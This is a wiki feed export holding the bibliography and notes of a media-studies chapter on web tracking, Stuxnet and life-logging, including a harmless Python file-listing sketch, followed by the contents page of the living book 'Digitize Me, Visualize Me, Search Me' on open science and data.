&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture Desire, ''TechCrunch'', accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress, accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) The cyber-road not taken, ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Haraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. E. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, ''The Smithsonian'', accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies, Locally Stored Objects (LSOs) and Document Object Model storage (DOM storage). &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of virus. Worms spread from computer to computer, often across networks, but, unlike a virus, a worm has the ability to transfer itself without requiring any human action. It does this by exploiting the file or information transport features on a computer, such as its networking setup, which allow it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm, together with careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, Ralph Langner then matched this against photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, confirming the importance of the cascade structure, centrifuge layout and enriching process through careful analysis of background images accidentally photographed on computers used by the president, see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was 03/02/2010 (Matrosov et al., n.d.), although there is suspicion that there may be three versions of the Stuxnet code, revised in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] There are some criticisms that this link may be spurious. For instance, Cryptome (2010) argues that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; may stand for &amp;quot;My-RTUs&amp;quot;, as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
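&lt;br /&gt;
The filesystem ‘archeology’ Wolfram describes is easy to sketch computationally: walk a directory tree, sort the files by their last-modification time, and inspect the oldest. The following minimal sketch in Python is offered for clarification only; the home-directory starting path and the choice of modification time as the marker of ‘age’ are illustrative assumptions, not Wolfram's own method. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# A sketch of filesystem 'archeology': list the files in a tree
# that have gone unmodified the longest. The starting path and the
# use of mtime are illustrative assumptions.
import os, time

def oldest_files(root, limit=10):
    ages = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                ages.append((os.path.getmtime(path), path))
            except OSError:
                pass  # skip unreadable entries
    # The earliest timestamps surface first, Wolfram-style.
    for mtime, path in sorted(ages)[:limit]:
        print(time.strftime('%Y-%m-%d', time.localtime(mtime)), path)

oldest_files(os.path.expanduser('~'))
&amp;lt;/pre&amp;gt; &lt;br /&gt;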
&lt;br /&gt;
[13] Some examples of software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants: I draw the notion of the actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software should be committed to the ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Digitize_Me,_Visualize_Me,_Search_Me&amp;diff=4702</id>
		<title>Digitize Me, Visualize Me, Search Me</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Digitize_Me,_Visualize_Me,_Search_Me&amp;diff=4702"/>
		<updated>2012-04-18T14:00:07Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:LifetrackingCover1.jpg|right|318x450px|LifetrackingCover1.jpg]] Open Science and its Discontents &lt;br /&gt;
&lt;br /&gt;
[http://www.livingbooksaboutlife.org/books/ISBN_Numbers ISBN: 978-1-60785-267-4]&lt;br /&gt;
&lt;br /&gt;
''edited by'' [http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me/bio Gary Hall] __TOC__ &lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Open_science/Introduction '''Introduction: White Noise: On the Limits of Openness (Living Book Mix)''']  ==&lt;br /&gt;
&lt;br /&gt;
One of the aims of the Living Books About Life series is to provide a 'bridge' or point of connection, translation, even interrogation and contestation, between the humanities and the sciences. Accordingly, this introduction to ''Digitize Me, Visualize Me, Search Me'' takes as its starting point the so-called ‘computational turn’ to data-intensive scholarship in the humanities. &lt;br /&gt;
&lt;br /&gt;
The phrase ‘[http://www.thecomputationalturn.com/ the computational turn]’ has been adopted to refer to the process whereby techniques and methodologies drawn from computer science and related fields – including science visualization, interactive information visualization, image processing, network analysis, statistical data analysis, and the management, manipulation and mining of data – are being increasingly used to produce new ways of approaching and understanding texts in the humanities - what is sometimes thought of as 'the digital humanities'. [http://www.livingbooksaboutlife.org/books/Open_science/Introduction (more...)] &lt;br /&gt;
&lt;br /&gt;
== Open Science  ==&lt;br /&gt;
&lt;br /&gt;
=== It’s An Open (Science), Open (Access), Open (Source), Open (Notebook) World  ===&lt;br /&gt;
&lt;br /&gt;
;[http://usefulchem.wikispaces.com/ Open Notebook Science ]&lt;br /&gt;
&lt;br /&gt;
;Patrick O. Brown, Michael B. Eisen, Harold Varmus&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0000036 Why PLoS Became a Publisher]&lt;br /&gt;
&lt;br /&gt;
;Sally Murray, Stephen Choi, John Hoey, Claire Kendall, James Maskalyk, and Anita Palepu&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/pdf/OpenMed-02-e1.pdf??tool=pmcentrez Open Science, Open Access and Open Source Software at ''Open Medicine'']&lt;br /&gt;
&lt;br /&gt;
=== Community Science  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=12873908}} &lt;br /&gt;
&lt;br /&gt;
;[http://www.psfk.com/2010/09/biocurious-a-community-lab-for-biotechnology.html BioCurious: A Community Lab for Biotechnology]&lt;br /&gt;
&lt;br /&gt;
;Richard Stallman&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosmedicine.org/article/info%3Adoi%2F10.1371%2Fjournal.pmed.0020047 Free Community Science and the Free Development of Science]&lt;br /&gt;
&lt;br /&gt;
=== 'This Revolution Will Be Digitized’: Online Tools for Open Science  ===&lt;br /&gt;
&lt;br /&gt;
;[http://biogang.openwetware.org/ Biogang]&lt;br /&gt;
&lt;br /&gt;
;Bill Hooker&amp;amp;nbsp; &lt;br /&gt;
:[http://3quarksdaily.blogs.com/3quarksdaily/2007/01/the_future_of_s.html The Future of Science is Open, Part 3: An Open Science World]&lt;br /&gt;
&lt;br /&gt;
;Chris Patil and Vivian Siegel&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2675795/ This Revolution Will Be Digitized: Online Tools for Radical Collaboration]&lt;br /&gt;
&lt;br /&gt;
=== Open Science Publishing  ===&lt;br /&gt;
&lt;br /&gt;
;Philip E. Bourne&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2877727/?tool=pmcentrez#pcbi.1000787-Hey1 What Do I Want from the Publisher of the Future?]&lt;br /&gt;
&lt;br /&gt;
;Cameron Neylon&amp;amp;nbsp; &lt;br /&gt;
:[http://pirsa.org/08090038/ Science in the Open/or/How I Learned to Stop Worrying and Love My Blog]&lt;br /&gt;
&lt;br /&gt;
== Open Knowledge  ==&lt;br /&gt;
&lt;br /&gt;
=== Access to Knowledge  ===&lt;br /&gt;
&lt;br /&gt;
;[http://okfn.org/ Open Knowledge Foundation]&lt;br /&gt;
&lt;br /&gt;
;Gaelle Krikorian and Amy Kapczynski, eds&amp;amp;nbsp; &lt;br /&gt;
:[http://www.soros.org/initiatives/information/focus/access/articles_publications/publications/age-of-intellectual-property-20101110/age-of-intellectual-property-20101110.pdf ''Access to Knowledge In the Age of Intellectual Property'']&lt;br /&gt;
&lt;br /&gt;
=== New Models for Open Sharing and Open Research  ===&lt;br /&gt;
&lt;br /&gt;
;Anne H. Margulies&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0020200 A New Model for Open Sharing]&lt;br /&gt;
&lt;br /&gt;
;Thomas B. Kepler, Marc A. Marti-Renom, Stephen M. Maurer, Arti K. Rai, Ginger Taylor, Matthew H. Todd&amp;amp;nbsp; &lt;br /&gt;
:[http://www.publish.csiro.au/nid/51/paper/CH06095.htm Open Source Research - The Power of Us]&lt;br /&gt;
&lt;br /&gt;
=== Open Knowledge and its Discontents  ===&lt;br /&gt;
&lt;br /&gt;
;J.J. King&amp;amp;nbsp; &lt;br /&gt;
:[http://www.metamute.org/proudtobeflesh The Packet Gang: Openness and its Discontents]&lt;br /&gt;
&lt;br /&gt;
;Michael Gurstein&amp;amp;nbsp; &lt;br /&gt;
:[http://gurstein.wordpress.com/2011/07/03/are-the-open-data-warriors-fighting-for-robin-hood-or-the-sheriff-some-reflections-on-okcon-2011-and-the-emerging-data-divide/ Are the Open Data Warriors Fighting for Robin Hood or the Sheriff?: Some Reflections on OKCon 2011 and the Emerging Data Divide]&lt;br /&gt;
&lt;br /&gt;
== Open Data  ==&lt;br /&gt;
&lt;br /&gt;
=== Data-Intensive Science  ===&lt;br /&gt;
&lt;br /&gt;
;Vincent S. Smith&amp;amp;nbsp; &lt;br /&gt;
:[http://www.biomedcentral.com/1756-0500/2/113 Data Publication: Towards a Database of Everything]&lt;br /&gt;
&lt;br /&gt;
;Tony Hey, Stewart Tansley, Kristen Tolle, eds&amp;amp;nbsp; &lt;br /&gt;
:[http://research.microsoft.com/en-us/collaboration/fourthparadigm/4th_paradigm_book_part4_complete.pdf Scholarly Communication, ''The Fourth Paradigm: Data-Intensive Scientific Discovery'']&lt;br /&gt;
&lt;br /&gt;
=== World of Data  ===&lt;br /&gt;
&lt;br /&gt;
;[http://www.freeourdata.org.uk/ Free Our Data]&lt;br /&gt;
&lt;br /&gt;
;Simon Rogers&amp;amp;nbsp; &lt;br /&gt;
:[http://www.guardian.co.uk/news/datablog/2010/nov/09/canada-open-data How Canada Became an Open Data and Data Journalism Powerhouse]&lt;br /&gt;
&lt;br /&gt;
=== We Can Know It For You  ===&lt;br /&gt;
&lt;br /&gt;
;Omer Tene&amp;amp;nbsp; &lt;br /&gt;
:[http://epubs.utah.edu/index.php/ulr/article/viewArticle/136 What Google Knows: Privacy and Internet Search Engines]&lt;br /&gt;
&lt;br /&gt;
;Daniel Chandramohan, Kenji Shibuya, Philip Setel, Sandy Cairncross, Alan D. Lopez, Christopher J. L. Murray, Basia Żaba, Robert W. Snow, Fred Binka&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosmedicine.org/article/info%3Adoi%2F10.1371%2Fjournal.pmed.0050057 Should Data from Demographic Surveillance Systems Be Made More Widely Available to Researchers?]&lt;br /&gt;
&lt;br /&gt;
== '''Digitize Me'''  ==&lt;br /&gt;
&lt;br /&gt;
=== Encode Me/Decode Me  ===&lt;br /&gt;
&lt;br /&gt;
;[http://www.ornl.gov/sci/techresources/Human_Genome/home.shtml Human Genome Project]&lt;br /&gt;
&lt;br /&gt;
;The ENCODE Project Consortium&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/picrender.cgi?accid=PMC3079585&amp;amp;blobtype=pdf&amp;amp;tool=pmcentrez A User's Guide to the Encyclopaedia of DNA Elements (ENCODE) ]&lt;br /&gt;
&lt;br /&gt;
;[http://www.decodeme.com/about-decodeme deCODEme]&lt;br /&gt;
&lt;br /&gt;
=== Life-Tracking  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=27381297}} &lt;br /&gt;
&lt;br /&gt;
;[http://quantifiedself.com Quantified Self]&lt;br /&gt;
